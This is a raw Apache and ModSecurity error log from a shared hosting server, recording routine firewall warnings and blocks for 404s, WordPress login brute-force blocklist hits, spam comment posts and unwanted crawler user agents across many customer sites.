[Tue May 26 16:19:54.384332 2026] [security2:error] [pid 782634:tid 782850] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV60f_P9qBfeb1w76ZjSAAAAFY"]
[Tue May 26 16:19:56.413388 2026] [security2:error] [pid 782634:tid 782768] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV60__P9qBfeb1w76ZjfgAAAAQ"]
[Tue May 26 16:19:58.371522 2026] [security2:error] [pid 782634:tid 782873] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV61f_P9qBfeb1w76Zj0QAAAG0"]
[Tue May 26 16:19:59.415212 2026] [security2:error] [pid 782634:tid 782786] [client 32.196.241.109:10343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV61__P9qBfeb1w76ZkBgAAABY"]
[Tue May 26 16:20:00.416199 2026] [security2:error] [pid 782634:tid 782777] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV61__P9qBfeb1w76ZkGwAAAA0"]
[Tue May 26 16:20:00.635734 2026] [security2:error] [pid 782634:tid 782787] [client 32.196.241.109:27987] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV62P_P9qBfeb1w76ZkNQAAABc"]
[Tue May 26 16:20:01.341790 2026] [security2:error] [pid 782634:tid 782847] [client 64.233.173.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahV62P_P9qBfeb1w76ZkRQAAAFM"]
[Tue May 26 16:20:01.651730 2026] [security2:error] [pid 782634:tid 782813] [client 32.196.241.109:63165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV62P_P9qBfeb1w76ZkOAAAADE"]
[Tue May 26 16:20:02.748323 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV62f_P9qBfeb1w76ZkaAAAADI"]
[Tue May 26 16:20:04.192250 2026] [security2:error] [pid 782634:tid 782794] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV62__P9qBfeb1w76ZkigAAAB4"]
[Tue May 26 16:20:06.476988 2026] [security2:error] [pid 782634:tid 782860] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV63f_P9qBfeb1w76ZkzgAAAGA"]
[Tue May 26 16:20:08.324884 2026] [security2:error] [pid 782634:tid 782797] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV63__P9qBfeb1w76ZlFwAAACE"]
[Tue May 26 16:20:10.760386 2026] [security2:error] [pid 782634:tid 782801] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV64v_P9qBfeb1w76ZlVwAAACU"]
[Tue May 26 16:20:12.277822 2026] [security2:error] [pid 782634:tid 782787] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV64__P9qBfeb1w76ZlfAAAABc"]
[Tue May 26 16:20:13.106834 2026] [security2:error] [pid 782634:tid 782823] [client 202.76.173.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV65P_P9qBfeb1w76ZljgAAADs"]
[Tue May 26 16:20:13.622289 2026] [security2:error] [pid 782634:tid 782732] [remote 195.250.23.247:37006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV65f_P9qBfeb1w76ZlpAAAUWE"]
[Tue May 26 16:20:14.783570 2026] [security2:error] [pid 782634:tid 782785] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV65f_P9qBfeb1w76ZlrwAAABU"]
[Tue May 26 16:20:17.854306 2026] [security2:error] [pid 782634:tid 782866] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV66P_P9qBfeb1w76Zl3gAAAGY"]
[Tue May 26 16:20:18.416262 2026] [security2:error] [pid 782634:tid 782812] [client 147.53.121.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV66v_P9qBfeb1w76ZmGQAAADA"], referer: https://www.anujtradingco.com/
[Tue May 26 16:20:18.614482 2026] [security2:error] [pid 782634:tid 782875] [client 89.110.64.239:55096] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.110.64.239" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahV66v_P9qBfeb1w76ZmIAAAAG8"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:20:18.614606 2026] [security2:error] [pid 782634:tid 782875] [client 89.110.64.239:55096] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahV66v_P9qBfeb1w76ZmIAAAAG8"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:20:19.012131 2026] [proxy:error] [pid 782634:tid 782871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:20:19.012194 2026] [proxy_http:error] [pid 782634:tid 782871] [client 205.210.31.76:59416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:20:19.012817 2026] [proxy:error] [pid 782634:tid 782871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:20:19.012851 2026] [proxy_http:error] [pid 782634:tid 782871] [client 205.210.31.76:59416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:20:19.523791 2026] [security2:error] [pid 782634:tid 782849] [client 114.119.138.98:53061] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/privacy-policy"] [unique_id "ahV66__P9qBfeb1w76ZmPgAAAFU"], referer: https://triviewsolutions.com/privacy-policy
[Tue May 26 16:20:19.701795 2026] [security2:error] [pid 782634:tid 782772] [client 147.53.121.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV66__P9qBfeb1w76ZmQQAAAAg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1507871&moderation-hash=f76559aea9a31bc2ff43d272cbf831bb
[Tue May 26 16:20:19.992902 2026] [security2:error] [pid 782634:tid 782780] [client 46.105.46.43:13255] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahV66__P9qBfeb1w76ZmSgAAABA"]
[Tue May 26 16:20:19.993014 2026] [security2:error] [pid 782634:tid 782780] [client 46.105.46.43:13255] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahV66__P9qBfeb1w76ZmSgAAABA"]
[Tue May 26 16:20:20.621176 2026] [security2:error] [pid 782634:tid 782846] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV66__P9qBfeb1w76ZmNwAAAFI"]
[Tue May 26 16:20:21.014952 2026] [security2:error] [pid 782634:tid 782826] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV66__P9qBfeb1w76ZmPQAAAD4"]
[Tue May 26 16:20:22.740329 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV67f_P9qBfeb1w76ZmaQAAADU"]
[Tue May 26 16:20:25.177513 2026] [security2:error] [pid 782634:tid 782776] [client 38.154.77.241:50893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV68P_P9qBfeb1w76ZmrQAAAAw"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 16:20:25.211159 2026] [security2:error] [pid 782634:tid 782772] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV67__P9qBfeb1w76ZmmwAAAAg"]
[Tue May 26 16:20:25.406496 2026] [autoindex:error] [pid 782634:tid 782861] [client 103.108.58.177:2648] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:20:26.220263 2026] [security2:error] [pid 782634:tid 782876] [client 85.208.96.193:11868] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahV68v_P9qBfeb1w76Zm2gAAAHA"]
[Tue May 26 16:20:26.220416 2026] [security2:error] [pid 782634:tid 782876] [client 85.208.96.193:11868] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahV68v_P9qBfeb1w76Zm2gAAAHA"]
[Tue May 26 16:20:26.312584 2026] [autoindex:error] [pid 782634:tid 782800] [client 185.169.4.152:50215] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:20:27.018993 2026] [security2:error] [pid 782634:tid 782851] [client 45.15.73.169:43259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.73.15.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahV68v_P9qBfeb1w76Zm5AAAAFc"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:20:27.019106 2026] [security2:error] [pid 782634:tid 782851] [client 45.15.73.169:43259] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahV68v_P9qBfeb1w76Zm5AAAAFc"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:20:27.869054 2026] [security2:error] [pid 782634:tid 782824] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV68f_P9qBfeb1w76Zm1wAAADw"]
[Tue May 26 16:20:27.996373 2026] [security2:error] [pid 782634:tid 782772] [client 147.53.121.158:61623] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV68__P9qBfeb1w76Zm6QAAAAg"], referer: https://anujtradingco.com
[Tue May 26 16:20:29.105042 2026] [security2:error] [pid 782634:tid 782789] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV69P_P9qBfeb1w76Zm9gAAABk"]
[Tue May 26 16:20:29.558364 2026] [security2:error] [pid 782634:tid 782666] [remote 65.2.90.30:55094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV69f_P9qBfeb1w76ZnCQAAex8"]
[Tue May 26 16:20:30.377983 2026] [security2:error] [pid 782634:tid 782804] [client 43.173.182.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV69v_P9qBfeb1w76ZnGQAAACg"]
[Tue May 26 16:20:30.624989 2026] [security2:error] [pid 782634:tid 782648] [remote 124.156.212.23:1613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV69v_P9qBfeb1w76ZnIAAAaA0"]
[Tue May 26 16:20:30.688473 2026] [security2:error] [pid 782634:tid 782828] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV69f_P9qBfeb1w76ZnEgAAAEA"]
[Tue May 26 16:20:32.187058 2026] [security2:error] [pid 782634:tid 782810] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV69__P9qBfeb1w76ZnNwAAAC4"]
[Tue May 26 16:20:33.943269 2026] [security2:error] [pid 782634:tid 782807] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV6-f_P9qBfeb1w76ZnZQAAK34"]
[Tue May 26 16:20:34.447863 2026] [security2:error] [pid 782634:tid 782786] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6-v_P9qBfeb1w76ZnaAAAABY"]
[Tue May 26 16:20:35.949155 2026] [security2:error] [pid 782634:tid 782800] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6-__P9qBfeb1w76ZnkAAAACQ"]
[Tue May 26 16:20:38.445390 2026] [security2:error] [pid 782634:tid 782859] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6_f_P9qBfeb1w76Zn0AAAAF8"]
[Tue May 26 16:20:39.259938 2026] [security2:error] [pid 782634:tid 782878] [client 92.246.140.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6_v_P9qBfeb1w76Zn4wAAAHI"]
[Tue May 26 16:20:40.063687 2026] [security2:error] [pid 782634:tid 782815] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6___P9qBfeb1w76Zn-AAAADM"]
[Tue May 26 16:20:40.224409 2026] [security2:error] [pid 782634:tid 782781] [client 168.138.50.91:20446] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "m2wealthadvisor.com"] [uri "/contact.php"] [unique_id "ahV7AP_P9qBfeb1w76ZoAgAAABE"]
[Tue May 26 16:20:40.224450 2026] [security2:error] [pid 782634:tid 782781] [client 168.138.50.91:20446] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "m2wealthadvisor.com"] [uri "/contact.php"] [unique_id "ahV7AP_P9qBfeb1w76ZoAgAAABE"]
[Tue May 26 16:20:40.517421 2026] [security2:error] [pid 782634:tid 782851] [client 114.119.138.99:23113] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/quality"] [unique_id "ahV7AP_P9qBfeb1w76ZoCwAAAFc"], referer: https://www.siliconelevators.in/contact
[Tue May 26 16:20:42.564743 2026] [security2:error] [pid 782634:tid 782828] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Af_P9qBfeb1w76ZoOgAAAEA"]
[Tue May 26 16:20:44.563989 2026] [security2:error] [pid 782634:tid 782825] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7BP_P9qBfeb1w76ZofAAAAD0"]
[Tue May 26 16:20:48.206280 2026] [security2:error] [pid 782634:tid 782798] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7B__P9qBfeb1w76ZozgAAACI"]
[Tue May 26 16:20:48.636100 2026] [security2:error] [pid 782634:tid 782868] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7B__P9qBfeb1w76Zo1gAAAGg"]
[Tue May 26 16:20:50.483986 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Cf_P9qBfeb1w76Zo9AAAADI"]
[Tue May 26 16:20:52.902259 2026] [security2:error] [pid 782634:tid 782786] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7DP_P9qBfeb1w76ZpNAAAABY"]
[Tue May 26 16:20:53.765048 2026] [security2:error] [pid 782634:tid 782841] [client 74.7.244.38:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahV7C__P9qBfeb1w76ZpJQAAAE0"]
[Tue May 26 16:20:53.765906 2026] [security2:error] [pid 782634:tid 782882] [client 74.7.244.38:40212] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bosscoirs.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahV7C__P9qBfeb1w76ZpIgAAdjU"]
[Tue May 26 16:20:54.162271 2026] [security2:error] [pid 782634:tid 782797] [client 114.119.129.92:23981] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV7Dv_P9qBfeb1w76ZpaQAAACE"], referer: http://haddingtonwines.com/cart?remove_item=64b3ec1fdfacead70c3a9bd77d824306
[Tue May 26 16:20:54.315849 2026] [security2:error] [pid 782634:tid 782871] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Df_P9qBfeb1w76ZpWgAAAGs"]
